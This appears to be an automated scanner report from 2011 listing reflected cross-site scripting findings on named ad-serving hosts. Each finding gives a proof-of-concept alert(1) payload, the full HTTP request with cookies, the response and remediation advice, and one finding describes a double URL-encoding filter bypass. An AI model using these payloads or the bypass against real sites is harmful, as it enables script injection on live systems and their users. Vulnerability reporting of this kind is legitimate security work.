Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:54:20 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683660:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:54:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 851
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12676"-alert(1)-"e19a228f6fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacb0"-alert(1)-"739720fb74 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20962"-alert(1)-"2a1d1d242bf was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96c1d"-alert(1)-"ac8d47e6ca4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa was submitted in the REST URL parameter 2. This input was echoed as 81851";alert(1)//aa8ae4a84fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135781851%2522%253balert%25281%2529%252f%252faa8ae4a84fa/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:54:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956 was submitted in the REST URL parameter 3. This input was echoed as 3e6b8";alert(1)//7ebd7131956 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:54:32 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c105a"-alert(1)-"fb1bd8b3ce2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f5e6"-alert(1)-"d81f699c354 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b539"-alert(1)-"67ea36dc1c6 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7423b"-alert(1)-"cb6a6387cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:54:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1682
1.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0da"-alert(1)-"8c42b551633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&bf0da"-alert(1)-"8c42b551633=1 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:29:57 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT Cache-Control: no-store Last-Modified: Wed, 02 Feb 2011 15:29:57 GMT Pragma: no-cache Content-Length: 4542 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&bf0da"-alert(1)-"8c42b551633=1&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Essc ...[SNIP]...
The value of the &q request parameter is copied into the HTML document as plain text between tags. The payload bdab1<img%20src%3da%20onerror%3dalert(1)>4640eb6d92 was submitted in the &q parameter. This input was echoed as bdab1<img src=a onerror=alert(1)>4640eb6d92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 4d05c<script>alert(1)</script>0e5436c2494 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494&callback=Demdex.parseBizo HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Wed, 02 Feb 2011 15:29:30 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 92 Connection: keep-alive
Unknown API key: (6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494)
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 33b74<script>alert(1)</script>22bbeb83d65 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Date: Wed, 02 Feb 2011 15:29:36 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KTissx4pIKRxvaj5XcunNcMDa7Re6IGD4lOuDZWVHyjN4Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAipIisFvtN4t4VEVUJBxdqAyBAisqZAs2SfkIE4k0isgs29d6PAF0Hy6gC0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 206 Connection: keep-alive
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload af475<script>alert(1)</script>5b56c3fcd0c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
